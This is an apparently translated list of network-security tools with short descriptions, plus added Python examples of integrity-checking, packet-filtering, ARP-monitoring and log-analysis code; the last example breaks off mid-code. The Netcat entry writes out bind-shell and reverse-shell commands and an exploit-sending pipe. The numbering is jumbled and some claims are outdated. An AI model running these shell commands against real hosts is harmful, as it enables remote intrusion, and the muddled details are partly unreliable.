1. Nessus is a leading tool for scanning UNIX vulnerabilities that later made its way to Windows. Its primary functions include local and remote security audits, a client/server architecture, a GTK graphical interface, and plugin scripting. It is free and open-source.
2. Wireshark When mentioning Wireshark, one must speak of Ethereal, which, along with Windows' Sniffer Pro, was known as one of the twin giants of network sniffing tools. Unlike Sniffer Pro, Ethereal is more widely used on Linux-like systems. Wireshark is the successor to Ethereal, released under a new name after Ethereal was acquired, and is the latest incarnation of that network sniffer. It is a powerful tool for capturing network data, allowing you to analyze network traffic and quickly pinpoint the sources of issues such as worms, trojans, and ARP spoofing.
3. Snort Snort is a free, cross-platform sniffer, packet logger, and intrusion detector for monitoring small TCP/IP networks. It runs on Linux/UNIX and Windows. Snort has three operating modes: sniffer, packet logger, and network intrusion detection system. In sniffer mode, Snort reads packets from the network and displays them on the console. For example, to print TCP/IP header information to the screen, use the command: snort -v
4. Netcat Netcat is dubbed the "Swiss Army knife," a simple yet useful tool for reading and writing data across network connections using the TCP or UDP protocol. It is designed to be a stable backdoor tool and a powerful network debugging and exploration utility. Examples:
1) Connect to TCP port 80 on 192.168.x.x: nc -nvv 192.168.x.x 80
2) Listen on TCP port 80 on the local machine: nc -l -p 80
3) Scan all ports from TCP 80 to TCP 445 on 192.168.x.x: nc -nvv -w2 -z 192.168.x.x 80-445
4) Bind the REMOTE host's CMD shell to TCP port 5354 on the REMOTE host (run on the REMOTE host): nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
5) Bind the REMOTE host's CMD shell and reverse-connect, e.g., to TCP port 5354 on 192.168.x.x (run on the REMOTE host): nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
6) For attack use, e.g., connect to port 80 on 192.168.x.x and send the contents of c:\exploit.txt through the pipe. Format 1: type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 Format 2: nc -nvv 192.168.x.x 80 < c:\exploit.txt
7) Use as a honeypot, e.g., use "-L" (note: uppercase L) to keep listening on a port until Ctrl+C: nc -L -p 80
5. Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a reliable platform for penetration testing, shellcode writing, and vulnerability research. The framework is mainly written in the object-oriented Perl programming language, with optional components written in C, assembly, and Python. The Metasploit Framework serves as a supporting tool for buffer overflow testing, as well as a vulnerability exploitation and testing platform. It integrates common overflow vulnerabilities and popular shellcode across platforms and is constantly updated, making buffer overflow testing convenient and simple.
9. Hping2 Hping2 is a network exploration tool and a super variant of ping. This small tool can send custom ICMP, UDP, and TCP packets and receive all the responses. For example, you can set the packet-sending interval (-i uX, where X is in microseconds) and the packet count (-c), with the command: hping2 192.168.0.1 -c 2 -i u1000
10. Kismet Kismet is a Linux-based wireless network scanner, a fairly handy tool that detects target WLANs by measuring the surrounding wireless signals. While Kismet runs, it displays the wireless networks it has found in the area. The "Name" column shows the SSID of the AP in the WLAN, and the originally chosen target WLAN should be among them. In that row, the value of the CH column (the channel used by the AP) should match what was initially recorded. The information displayed at the far right of the window is the number of WLANs discovered by Kismet, the number of packets captured, the number of encrypted packets, and so on. Even if the target computer is turned off, Kismet can detect packets from the target AP, because the AP continuously emits "beacons" informing computers with wireless cards that an AP is in range.
11. Tcpdump Based on Linux, Tcpdump can fully intercept the headers of packets transmitted over the network for analysis. It supports filtering by network layer, protocol, host, network, or port and provides the logical operators and, or, and not to help you eliminate useless information. Tcpdump is a free network analysis tool; because its source is open, it is highly extensible, making it very useful to network administrators and intruders alike.
12. Cain and Abel is a password recovery tool for the Windows platform. It uses multiple methods to recover various kinds of passwords, including: sniffing the network; cracking encrypted passwords with dictionary, brute-force, and cryptanalysis attacks; recording VoIP sessions; decoding scrambled passwords; recovering wireless network keys; revealing passwords entered in password boxes (password viewing); exposing cached passwords; and analyzing routing protocols. The tool does not exploit any software vulnerabilities or defects; instead it exploits security weaknesses inherent in protocol standards, authentication methods, and caching mechanisms to recover passwords and credentials from various programs. The software consists of two parts: Cain and Abel. Cain (Cain.exe) is the program's main graphical interface, while Abel is a Windows service consisting of the files Abel.exe and Abel.dll.
13. John the Ripper is software used to attempt to recover cleartext from known ciphertext. The current latest version is JOHN 1.4, which supports cracking ciphertext produced with the DES and MD5 methods. It runs on different machine types and operating systems.
14. Ettercap was initially designed as a sniffer for switched networks, but as it evolved it gained more and more features, and it now serves as an effective and flexible man-in-the-middle attack tool. It supports both active and passive protocol analysis and includes many network- and host-level analyses (such as OS fingerprinting). Ettercap has five sniffing modes: (1) IPBASED: an IP-address-based mode in which Ettercap captures packets according to source IP:port and destination IP:port. (2) MACBASED: a MAC-address-based mode in which Ettercap captures packets according to source MAC and destination MAC. (3) ARPBASED: in this mode Ettercap uses ARP spoofing to listen to the (full-duplex) communication between two hosts on the switched LAN. (4) SMARTARP: in this mode Ettercap uses ARP spoofing to listen to the (full-duplex) communication between one host and all other known hosts on the switched network (hosts present in the host table). (5) PUBLICARP: in this mode Ettercap uses ARP spoofing to monitor the (half-duplex) communication between one host and all other hosts on the switched network.
15. Nikto is an open-source and powerful web scanning assessment tool that tests web servers for multiple security issues. It can scan for over 2,600 potentially dangerous files, CGIs, and other issues on more than 230 types of servers. It can identify the web server type of the specified host, host name, specific directories, cookies, specific CGI vulnerabilities, the HTTP methods allowed by the host, and more. It uses the LibWhisker library, but is generally updated more frequently than Whisker. Nikto is one of the essential web auditing tools for network security personnel.
13. Ping/telnet/dig/traceroute/whois/netstat: The most basic security commands.
17. OpenSSH / PuTTY / SSH SSH (Secure Shell) is now commonly used to log into remote computers or execute commands on them. It provides encrypted communication between untrusted computers over insecure networks, replacing the insecure telnet/rlogin/rsh interactions. Most UNIX users use the open-source OpenSSH server and client programs. Windows users prefer the free PuTTY client, which also runs on various mobile devices. Some Windows users also like running OpenSSH under a terminal emulation layer such as Cygwin.
18. THC Hydra If someone needs to perform a brute-force attack on a remote authentication service, Hydra is often the tool of choice. It can quickly perform dictionary-based attacks against more than 30 services, including telnet, ftp, http, https, smb, various databases, and others. Like THC Amap, Hydra comes from the non-profit organization THC.
19. Paros proxy is an intermediary placed between the attacker's browser and the target website. All requests and responses pass through it, allowing hackers to study the packet details carefully, including the variables transmitted within web pages, which can then be modified and resent. The proxy is feature-rich, with website vulnerability scanning and detection capabilities, and can test for common web application attacks, even detecting unsafe web components.
20. Dsniff is an advanced password sniffer and one of the first tools to extend the traditional sniffer concept into a listening tool. It injects crafted packets into the network and redirects communication data to the attacker's machine. In this way, Dsniff allows attackers to eavesdrop on data in a switched network environment, even when the attacker and target are not on the same LAN, and to collect the desired data. It supports application protocols such as telnet, ftp, smtp, pop, imap, and http.
18. NetStumbler NetStumbler is a specialized tool for finding wireless access points (APs) and is currently the most popular wireless search tool. Once started, it automatically displays any nearby wireless APs it detects, along with information such as their SSID, MAC address, channel, speed, and whether they are encrypted. Notably, NetStumbler can display wireless APs with hidden SSIDs in its interface, showing the AP's green light continuously flashing. It presents every nearby wireless AP thanks to a comprehensive scan, leaving none undiscovered. Since it was developed in the US, it can only scan the 11 channels from 1 to 11, compared to China's 13 channels, so wireless APs on channels 12-13 will not be found.
21. THC Amap can detect which program is listening on a particular port. Because of its unique version-detection approach, its database is not as large as Nmap's. If Nmap fails to detect a service or other software is ineffective, consider using Amap. Another feature of Amap is that it can parse Nmap output files. This is another valuable tool contributed by THC.
22. GFI LANguard The three primary challenges of enterprise network vulnerability management are network scanning, network auditing, and patch management. GFI LANguard Network Security Scanner (N.S.S.) is an award-winning solution capable of scanning, detecting, evaluating, and remediating any security vulnerabilities within a network. As an administrator, you often handle these issues separately, sometimes using different products for network vulnerability scanning, patch management, and network auditing. With GFI LANguard N.S.S., the three primary challenges of vulnerability management can be addressed through a single control panel with comprehensive reporting capabilities.
21. Aircrack Aircrack is a suite of tools for cracking WEP and WPA keys, often used for obtaining unauthorized access to wireless networks. Once enough encrypted packets are collected, it can crack 40 to 512-bit WEP keys and can also break into WPA1 or WPA2 networks using advanced encryption methods or brute-force attacks.
22. Superscan SuperScan, developed by Foundstone, is a free yet highly powerful tool. It is both a hacker tool and a network security tool compared to many similar tools. A hacker can use its denial-of-service (DoS) attacks to gather information about remote network host systems. As a security tool, SuperScan can help you uncover vulnerabilities within your network.
25. Netfilter In simple terms, Netfilter's architecture places several checkpoints (hooks) along the network packet processing path, and processing functions (such as packet filtering, NAT, or even custom functions) are registered at each checkpoint.
26. Sysinternals is a suite of security management tools that includes: (1) Process Explorer: a process management tool that can completely replace the system's built-in Task Manager (taskmgr) as the default "task manager." Its various monitors intuitively display the current system state, and it is very easy to use. It supports XP, Win2003, and later. (2) PsTools: a set of 12 commands for remotely managing Windows NT/2000/XP systems. It can remotely organize hard drives, stop the Messenger service on remote computers, check free disk space on servers, view processes on remote computers, terminate suspicious processes, send messages, and quickly shut down remote computers, among other things. (3) Autoruns: a powerful and comprehensive startup-item scanner. (4) TCPView: a very small yet highly useful port-monitoring tool. (5) RootkitRevealer checks whether the Windows system is running any rootkits by comparing the registry and file system as seen through the Windows API with the raw on-disk data and reporting discrepancies. It can detect all rootkits released on www.rootkit.com, such as AFX, Vanquish, and HackerDefender. (Note: RootkitRevealer cannot detect rootkits that have no hidden files or registry entries, like FU_Rootkit.)
27. Retina has been recognized as the most accurate non-intrusive network security scanner. It includes the most comprehensive security vulnerability database, maintained by eEye's research team. As professional security software, Retina is used by many of the world's largest companies and government departments to test network security, identifying and correcting hidden vulnerabilities and unsafe settings in their networks.
28. Perl / Python / Ruby Perl is older than Ruby or Python. Perl was once the most popular scripting language and was considered essential for hackers. It can handle complex data processing in just a few lines, runs not much slower than C, and has impressive built-in support for regular expressions and data structures. Many websites were previously written in Perl, and even now some older websites abroad still have portions of their code in Perl. Perl's strongest point is its countless libraries, backed by what is likely the world's largest programming community: you can find a library for nearly anything you want to do. However, Perl's drawback is also significant: its programs are extremely flexible, with many solutions to one problem, much like having many ways to say the same thing, and its syntax can look completely foreign to those unfamiliar with it. Ruby and Python emerged as alternatives to Perl. Perl's latest versions added object-oriented support, and Ruby and Python offer even better object-oriented support (better even than Java).
29. L0phtcrack L0phtCrack v5.04, referred to as LC 5, is a must-have tool for network administrators to check whether Windows and UNIX users are using insecure passwords. It is also the best and fastest tool for cracking administrator account passwords on Win NT/2000/XP/UNIX. It has been proven that simple or easily cracked administrator passwords pose one of the greatest security risks, as attackers can often log in as legitimate users undetected.
28. Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery, and packet sniffer. It provides a variety of interactive features for generating, manipulating, sending, sniffing, responding to, and matching packets.
29. Sam Spade offers a friendly GUI to conveniently complete various network query tasks. It was developed with the intention of tracking down spammers but is also used for other extensive network exploration, management, and security-related tasks, including tools like ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, and website search, forming an integrated toolbox.
32. GnuPG / PGP With the development of the internet and computer technology, the security of data storage and data exchange has become increasingly important. Encryption has long been used to secure both. To ensure that identities are verified during network data exchange, certificate systems have matured. GnuPG is a suite for encrypting data and creating certificates; its functionality is similar to PGP's, though PGP uses many patented algorithms.
33. Airsnort exploits the widespread flaws of the "Wi-Fi" (or 802.11b) network encryption system to gain network access, though no encryption system has yet been broken by AirSnort or WEPCrack. The creators of AirSnort believe many network users fail to recognize or understand the flaws in Wi-Fi encryption.
32. BackTrack is a live boot and run CD based on Slackware and SLAX, containing a suite of security and computer forensics tools. It was created by merging Auditor Security Linux and WHAX (formerly Whoppix).
33. P0f is a passive remote operating system identification tool following Nmap and Xprobe2. It supports: reverse connection SYN mode, forward connection SYN+ACK mode, empty connection RST+ mode, fragmented ACK mode. It can also detect: if a system is running behind a firewall, in NAT mode, load balancing mode, remote system uptime, and DSL and ISP information of the remote system.
36. Google: Everybody's favorite search engine.
35. WebScarab: A proxy software including proxy, web crawler, web spider, session analysis, automatic script interface, fuzz testing tool, encoding/decoding of all popular formats, service description languages and parsers, etc.
38. Ntop: NTOP can associate port usage with applications, similar to the effect of the "netstat -an" command, and show details such as when a port was opened, its traffic, etc. For instance, it can associate the TCP/UDP ports open on the local machine with applications.
39. Tripwire is the most famous Unix file system integrity checker. Its technical core is to generate a digital signature for each monitored file and preserve it; if the current file's digital signature does not match the preserved one, the file has been modified.
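As an added illustration of the mechanism described in item 37 (this is example code written for this page, not Tripwire's own), the Python below builds a baseline of per-file digests and permission bits and then reports which files under a tree were modified, added or removed. The directory layout, file names and contents are constructed inside a temporary directory purely for the demonstration.

```python
"""Tripwire-style file integrity check (added example, not Tripwire code).
Builds a baseline of file digests, then reports files that were modified,
added or removed.  The demo runs against constructed files in a temp dir."""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict


def digest_file(path: Path) -> str:
    """SHA-256 of the file contents, read in chunks so large files are fine."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, Dict]:
    """Record digest, size and permission bits for every regular file under root."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            st = path.stat()
            baseline[path.relative_to(root).as_posix()] = {
                "sha256": digest_file(path),
                "size": st.st_size,
                "mode": st.st_mode & 0o7777,
            }
    return baseline


def verify(root: Path, baseline: Dict[str, Dict]) -> Dict[str, list]:
    """Compare the tree's current state with the stored baseline."""
    current = build_baseline(root)
    report = {"modified": [], "added": [], "removed": []}
    for rel, rec in baseline.items():
        now = current.get(rel)
        if now is None:
            report["removed"].append(rel)
        elif now["sha256"] != rec["sha256"] or now["mode"] != rec["mode"]:
            report["modified"].append(rel)
    report["added"] = sorted(set(current) - set(baseline))
    return report


def demo() -> Dict[str, list]:
    """Constructed scenario: baseline two files, then change one, delete one, add one."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        # What Tripwire keeps in its database; here serialised to show it is plain data.
        stored = json.dumps(build_baseline(root))
        with (root / "etc" / "passwd").open("a") as fh:
            fh.write("newuser:x:1001:1001::/home/newuser:/bin/sh\n")
        (root / "etc" / "hosts").unlink()
        (root / "etc" / "extra.conf").write_text("option=1\n")
        return verify(root, json.loads(stored))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

The check is only as trustworthy as the stored baseline: if an intruder who modifies a file can also rewrite the baseline, nothing is detected. That is why the baseline belongs on read-only or off-host storage, and why Tripwire protects its database with a signature rather than a bare hash.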
40. Ngrep is a network version of grep (the tool for searching for strings in text): it offers most of grep's features but searches the payloads of network packets. Because Ngrep is built on the libpcap library, it supports a wide range of operating systems and network protocols. It can identify TCP, UDP, and ICMP packets and understands BPF filter expressions.
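The filter expressions that items 8 (Tcpdump) and 38 (Ngrep) mention are easier to reason about with a small implementation in hand. The Python below is an added example, not code from tcpdump, libpcap or ngrep: it parses a subset of the BPF filter language (tcp/udp/icmp, host, port, net, with not/and/or and parentheses at tcpdump's precedence) into a predicate, applies it to a list of packet records, and then, ngrep-style, runs a regular expression over the payloads of the packets that pass. The packet dictionaries, addresses and payloads are constructed sample data.

```python
"""Toy tcpdump/ngrep-style packet filter (added example; not code from tcpdump,
libpcap or ngrep).  Packet records and addresses below are constructed."""
import ipaddress
import re
from typing import Callable, Dict, List, Optional

Packet = Dict[str, object]
Pred = Callable[[Packet], bool]


class FilterParser:
    """Recursive-descent parser for a subset of the BPF filter language:
    tcp | udp | icmp | [src|dst] host IP | [src|dst] port N | [src|dst] net CIDR,
    combined with not / and / or (tightest to loosest, as in tcpdump) and ()."""
    PROTOS = ("tcp", "udp", "icmp")

    def __init__(self, text: str) -> None:
        self.toks = text.replace("(", " ( ").replace(")", " ) ").split()
        self.pos = 0

    def peek(self) -> Optional[str]:
        return self.toks[self.pos] if self.pos < len(self.toks) else None

    def take(self) -> str:
        tok = self.peek()
        if tok is None:
            raise ValueError("unexpected end of filter")
        self.pos += 1
        return tok

    def parse(self) -> Pred:
        pred = self.expr()
        if self.peek() is not None:
            raise ValueError(f"unexpected token {self.peek()!r}")
        return pred

    def expr(self) -> Pred:        # expr := term ('or' term)*
        left = self.term()
        while self.peek() == "or":
            self.take()
            left = self._or(left, self.term())
        return left

    def term(self) -> Pred:        # term := factor ('and' factor)*
        left = self.factor()
        while self.peek() == "and":
            self.take()
            left = self._and(left, self.factor())
        return left

    def factor(self) -> Pred:      # factor := 'not' factor | '(' expr ')' | primitive
        if self.peek() == "not":
            self.take()
            inner = self.factor()
            return lambda pkt: not inner(pkt)
        if self.peek() == "(":
            self.take()
            inner = self.expr()
            if self.take() != ")":
                raise ValueError("missing ')'")
            return inner
        return self.primitive()

    def primitive(self) -> Pred:
        tok = self.take()
        if tok in self.PROTOS:
            return lambda pkt, proto=tok: pkt["proto"] == proto
        direction = None
        if tok in ("src", "dst"):
            direction, tok = tok, self.take()
        if tok == "host":
            ip = self.take()
            fields = self._fields(direction, "src", "dst")
            return lambda pkt: any(pkt[f] == ip for f in fields)
        if tok == "port":
            port = int(self.take())
            fields = self._fields(direction, "sport", "dport")
            return lambda pkt: any(pkt.get(f) == port for f in fields)  # ICMP has no ports
        if tok == "net":
            net = ipaddress.ip_network(self.take(), strict=False)
            fields = self._fields(direction, "src", "dst")
            return lambda pkt: any(ipaddress.ip_address(pkt[f]) in net for f in fields)
        raise ValueError(f"unknown primitive {tok!r}")

    @staticmethod
    def _fields(direction, src_field, dst_field):
        """Which packet fields a qualifier applies to: src, dst, or either."""
        return {"src": (src_field,), "dst": (dst_field,), None: (src_field, dst_field)}[direction]

    @staticmethod
    def _and(a: Pred, b: Pred) -> Pred:
        return lambda pkt: a(pkt) and b(pkt)

    @staticmethod
    def _or(a: Pred, b: Pred) -> Pred:
        return lambda pkt: a(pkt) or b(pkt)


def filter_packets(packets: List[Packet], expression: str) -> List[Packet]:
    """tcpdump-style: keep the packets for which the filter predicate holds."""
    pred = FilterParser(expression).parse()
    return [p for p in packets if pred(p)]


def grep_packets(packets: List[Packet], expression: str, pattern: bytes) -> List[Packet]:
    """ngrep-style: apply the BPF filter, then a regex over each payload."""
    regex = re.compile(pattern)
    return [p for p in filter_packets(packets, expression) if regex.search(p["payload"])]


# Constructed sample capture (not real traffic).
SAMPLE_PACKETS: List[Packet] = [
    {"proto": "tcp", "src": "10.0.0.5", "dst": "93.184.216.34", "sport": 51000, "dport": 80,
     "payload": b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"},
    {"proto": "tcp", "src": "10.0.0.7", "dst": "10.0.0.9", "sport": 51001, "dport": 80,
     "payload": b"POST /upload HTTP/1.1\r\nHost: intranet\r\n\r\n"},
    {"proto": "udp", "src": "10.0.0.5", "dst": "10.0.0.1", "sport": 53000, "dport": 53,
     "payload": b"\x12\x34\x01\x00\x00\x01\x00\x00"},
    {"proto": "icmp", "src": "10.0.0.5", "dst": "10.0.0.1", "payload": b""},
]
```

With the sample capture, `filter_packets(SAMPLE_PACKETS, "tcp and port 80 and not host 10.0.0.5")` keeps only the intranet POST, and `grep_packets(SAMPLE_PACKETS, "tcp", rb"^(GET|POST) /")` returns both HTTP requests, which is the same two-stage selection (BPF filter first, payload pattern second) that ngrep performs.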
39. Nbtscan is a small tool for scanning NetBIOS information on Windows networks but can only be used on a local network. It can display IP, host names, user names, and MAC addresses, among other data.
40. WebInspect is considered a next-generation web application security testing tool. Its main functions include: (1) Utilizing innovative assessment techniques to check the security of web services and web applications; (2) Automatically performing web application security testing and assessments; (3) Conducting application security testing and collaborations throughout the lifecycle; (4) Running interactive scans with a cutting-edge user interface; (5) Performing penetration tests using advanced tools (HP Security Toolkit); (6) Configuring to support any web application environment.
41. OpenSSL SSL stands for Secure Socket Layer, providing encrypted transmission on the Internet. The OpenSSL software package is divided into three main functionality sections: Cryptographic Algorithm Library, SSL Protocol Library, and applications.
44. Xprobe2 Xprobe2 uses a fuzzy matrix and statistical analysis of the characteristics of the ICMP packets it actively elicits to determine the remote operating system type.
43. EtherApe is a network sniffer with functionalities equivalent to Tcpdump, but with a more user-friendly interface. Both EtherApe and Tcpdump rely on the pcap library (libpcap); thus, they share many similar features (such as using the same filtering rules and keywords). EtherApe and other graphical network sniffers use the same.
44. Core Impact is recognized as the strongest vulnerability detection tool, offering comprehensive evaluation, detection, prevention, and response to information security threats. It replicates real-world attacks on network servers, workstations, and end-user systems, assisting in finding and fixing security issues.
45. IDA Pro is an interactive "analyst," though it doesn't automatically solve problems. IDA Pro flags instructions as suspicious but doesn't resolve these issues itself. Your job is to instruct IDA on how to proceed.
46. SolarWinds is a professional network management software suite, capable of monitoring and discovering network devices. It includes the following tools: 1. Network Performance Monitoring: Bandwidth Measurement, Router CPU Load, Bandwidth Monitoring, CPU Measurement, Network Performance Monitor, SNMP Image, and Advanced CPU Upload. 2. Network Discovery: Subnet List, Ping Sweep, IP Network Browser, DNS Check, IP Address Management, MAC Address Discovery, SNMP Sweep, Network Location. 3. Cisco Networking Tools: IP Network Browser, Router CPU Load, Configuration Download, Configuration Upload, Configuration Editor/Browser, Proxy Ping, Compare Running vs Startup Configurations, Router Password Encryption, CPU Measurement, Router Security Check, and Advanced CPU Upload. 4. Network Monitoring: Watch It!, Network Monitor, Syslog Server, Router CPU Load, Advanced Ping, and Network Performance Monitor. 5. IP Address Management: Advanced Subnet Calculator, DNS / Who Is Resolver, DHCP Scope Monitor, DNS Check, IP Address Management, Ping Sweep. 6. Security: Router Security Check, TCP Reset, Dictionary Editor, SNMP Brute Force Attack, SNMP Dictionary Attack, Router Password Encryption. 7. Ping & Diagnostic: Ping, Advanced Ping, Trace Route, Proxy Ping, Ping Sweep. 8. MIB Browser: MIB Walk, System MIBs Update, MIB Browser, and SNMP Image. 9. Others: TFTP Server, WAN Killer, Wake-On-LAN.
47. Pwdump: A tool used to extract Windows user password files.
48. LSoF Its full name is "list open files," meaning it lists the files currently open on the system. We know that everything in the Linux environment is a file: devices are files, directories are files, even sockets are files. Thus, making good use of the lsof command is very helpful in day-to-day Linux administration.
49. RainbowCrack is a multifaceted password cracking program capable of recovering passwords and a powerful tool against cryptographic hash algorithms. For example, it can crack LM, MD5, SHA-1, and user-defined hashes, and other hash algorithms can be added to the software. It supports both Windows and Linux, and the tables generated on one system can be transferred directly for use on the other. Although it is powerful, it is quite complex to use.
50. Firewalk is a Linux network security tool that analyzes IP packet responses using traceroute-like technology, thus determining gateway access control lists and mapping networks.
51. Angry IP Scanner is a convenient IP and port scanning tool. It can obtain the ping response time, host name, computer name, workgroup, login username, MAC address, TTL, NetBios information of a machine being scanned; it can also specify scanning ports and view open ports on the target computer. You can perform operations like opening in an explorer, browsing with a web browser, FTP, telnet, ping, tracert, or geo-locating the specified IP for active hosts. Angry IP Scanner can automatically resolve the IP address of a single URL or hostname to begin scanning. It also supports automatically selecting and scanning entire B and C class IP ranges, managing commonly used IPs, and exporting scanning results in various file formats. By employing multi-threaded scanning, Angry IP Scanner can initiate scans on dozens of IPs simultaneously, making it very fast.
52. RKHunter, short for "Rootkit Hunter," can detect approximately 58 known rootkits as well as some sniffers and backdoor programs. It determines whether a machine is infected with rootkits by running a series of test scripts.
53. Ike-scan is a tool for checking the transmission characteristics of IKE (Internet Key Exchange) services. IKE is the mechanism for establishing connections between VPN servers and remote clients. After scanning a VPN server's IP address, it sends modified IKE packets to each host in the VPN network. Any host running IKE will respond to confirm its presence. The tool then records and displays these response packets, comparing them against a range of known VPN product fingerprints.
54. Arpwatch ARP (Address Resolution Protocol) resolves an IP address to the hardware address of a network device. On a Linux system, Arpwatch listens to the ARP packets on the local network, records the IP-to-MAC pairings it sees, and reports any changes it detects via e-mail.
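To make the detection logic concrete, here is an added Python example modelled on what Arpwatch does (it is not Arpwatch's code): it keeps an IP-to-MAC table, reports a new station the first time an IP is seen, a changed ethernet address when an IP's MAC changes, and a flip flop when it changes back to the previous MAC, and it tags changes on an IP you declare to be a gateway, because a gateway whose MAC keeps changing is the classic symptom of the ARP spoofing mentioned under Wireshark and Ettercap. The "time ip mac" log lines and the gateway address are constructed sample data.

```python
"""Arpwatch-style IP-to-MAC change monitor (added example, not Arpwatch's code).
The observations below are a constructed capture, not real traffic."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed ARP observations, "time ip mac", as a LAN sniffer might log them.
SAMPLE_ARP_LOG = """\
10:00:01 192.168.1.1 00:11:22:33:44:55
10:00:02 192.168.1.10 aa:bb:cc:dd:ee:01
10:00:03 192.168.1.1 00:11:22:33:44:55
10:00:04 192.168.1.1 DE:AD:BE:EF:00:01
10:00:05 192.168.1.1 00:11:22:33:44:55
10:00:06 192.168.1.1 de:ad:be:ef:00:01
"""


@dataclass
class Station:
    mac: str
    previous_mac: Optional[str]   # the MAC seen before the last change, for flip-flop detection
    first_seen: str
    last_seen: str


class ArpMonitor:
    def __init__(self, gateways: Iterable[str] = ()) -> None:
        self.table: Dict[str, Station] = {}
        self.gateways = set(gateways)
        self.events: List[Tuple[str, str, str, str]] = []   # (kind, ip, mac, time)

    def observe(self, ts: str, ip: str, mac: str) -> None:
        mac = mac.lower()   # compare hardware addresses case-insensitively
        st = self.table.get(ip)
        if st is None:
            self.table[ip] = Station(mac, None, ts, ts)
            self.events.append(("new station", ip, mac, ts))
            return
        st.last_seen = ts
        if mac == st.mac:
            return   # same pairing as before: nothing to report
        kind = "flip flop" if mac == st.previous_mac else "changed ethernet address"
        self.events.append((kind, ip, mac, ts))
        st.previous_mac, st.mac = st.mac, mac

    def feed_log(self, text: str) -> None:
        for line in text.splitlines():
            if line.strip():
                ts, ip, mac = line.split()
                self.observe(ts, ip, mac)

    def report(self) -> List[str]:
        """One line per event, in the spirit of Arpwatch's notification mail."""
        lines = []
        for kind, ip, mac, ts in self.events:
            tag = " (gateway!)" if ip in self.gateways and kind != "new station" else ""
            lines.append(f"{ts} {kind}{tag}: {ip} is now at {mac}")
        return lines


def event_kinds(text: str = SAMPLE_ARP_LOG) -> List[str]:
    mon = ArpMonitor(gateways=("192.168.1.1",))
    mon.feed_log(text)
    return [kind for kind, _, _, _ in mon.events]


def gateway_alerts(text: str = SAMPLE_ARP_LOG, gateways: Iterable[str] = ("192.168.1.1",)) -> List[str]:
    """Events that change the MAC of a declared gateway: the ARP-spoofing symptom."""
    mon = ArpMonitor(gateways)
    mon.feed_log(text)
    return [line for line in mon.report() if "(gateway!)" in line]


if __name__ == "__main__":
    for line in gateway_alerts():
        print(line)
```

In the constructed log the gateway 192.168.1.1 changes address at 10:00:04 and then alternates twice more, so the monitor reports one changed ethernet address followed by two flip flops, all tagged as gateway events; a single address change can be a legitimate hardware replacement, but repeated alternation between two MACs on the gateway IP is what a defender should treat as a likely spoofing attempt.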
55. KisMAC is a free wireless protocol sniffing program for Mac OS. Upon installation, KisMAC's installer sets file permissions insecurely, allowing a local attacker to exploit the vulnerability to gain unauthorized access to sensitive file information.
56. OSSEC HIDS is an open-source intrusion detection system that includes log analysis, integrity checking, and rootkit detection. As a HIDS, OSSEC is installed on the system being monitored. A complete installation is not always necessary: when several computers have OSSEC installed, they can run in client/server mode, with the clients sending data back to the server for analysis, so that multiple systems are monitored from one machine. This is a valuable solution for both enterprise and home users. OSSEC's main advantage is that it runs on almost any operating system, such as Windows, Linux, OpenBSD/FreeBSD, and macOS. However, a Windows client cannot perform rootkit detection, while clients on other systems can.
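The log-analysis half of a HIDS is easy to sketch. The Python below is an added example, not OSSEC's code, and its rule names and levels only loosely imitate OSSEC's sshd rules: a decoder splits syslog lines written by sshd into timestamp, host and message; single-event rules raise a low-level alert for each failed or accepted login; and a frequency rule raises a high-level composite alert when one source address accumulates five failures within two minutes. The log lines, hostname and addresses are constructed sample data.

```python
"""OSSEC-style log analysis in miniature (added example; not OSSEC's code, and
the rule names and levels only loosely imitate OSSEC's sshd rules).  The log
lines, hosts and addresses are constructed sample data."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List

# Decoder: split a syslog line written by sshd into timestamp, host and message.
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: (?P<msg>.*)$")
FAILED_RE = re.compile(r"^Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPTED_RE = re.compile(r"^Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")

FREQ_THRESHOLD = 5    # this many failures from one source address ...
FREQ_WINDOW_S = 120   # ... within this many seconds raises the composite alert


class LogAnalyzer:
    def __init__(self) -> None:
        self.recent_failures = defaultdict(deque)   # srcip -> timestamps of recent failures
        self.alerts: List[Dict] = []

    def feed(self, line: str) -> None:
        m = SYSLOG_RE.match(line)
        if not m:
            return   # not an sshd line; a real HIDS would try its other decoders
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        host, msg = m["host"], m["msg"]
        failed = FAILED_RE.match(msg)
        accepted = ACCEPTED_RE.match(msg)
        if failed:
            self._alert(5, "sshd: authentication failed", host, failed["ip"], failed["user"], ts)
            self._check_frequency(host, failed["ip"], ts)
        elif accepted:
            self._alert(3, "sshd: authentication success", host, accepted["ip"], accepted["user"], ts)

    def _check_frequency(self, host: str, ip: str, ts: datetime) -> None:
        """Frequency rule: correlate failures per source over a sliding time window."""
        window = self.recent_failures[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > FREQ_WINDOW_S:
            window.popleft()
        if len(window) >= FREQ_THRESHOLD:
            self._alert(10, "sshd: brute force trying to get access", host, ip, None, ts)
            window.clear()   # fire once per burst, like a rule with an ignore time

    def _alert(self, level, rule, host, ip, user, ts) -> None:
        self.alerts.append({"level": level, "rule": rule, "host": host,
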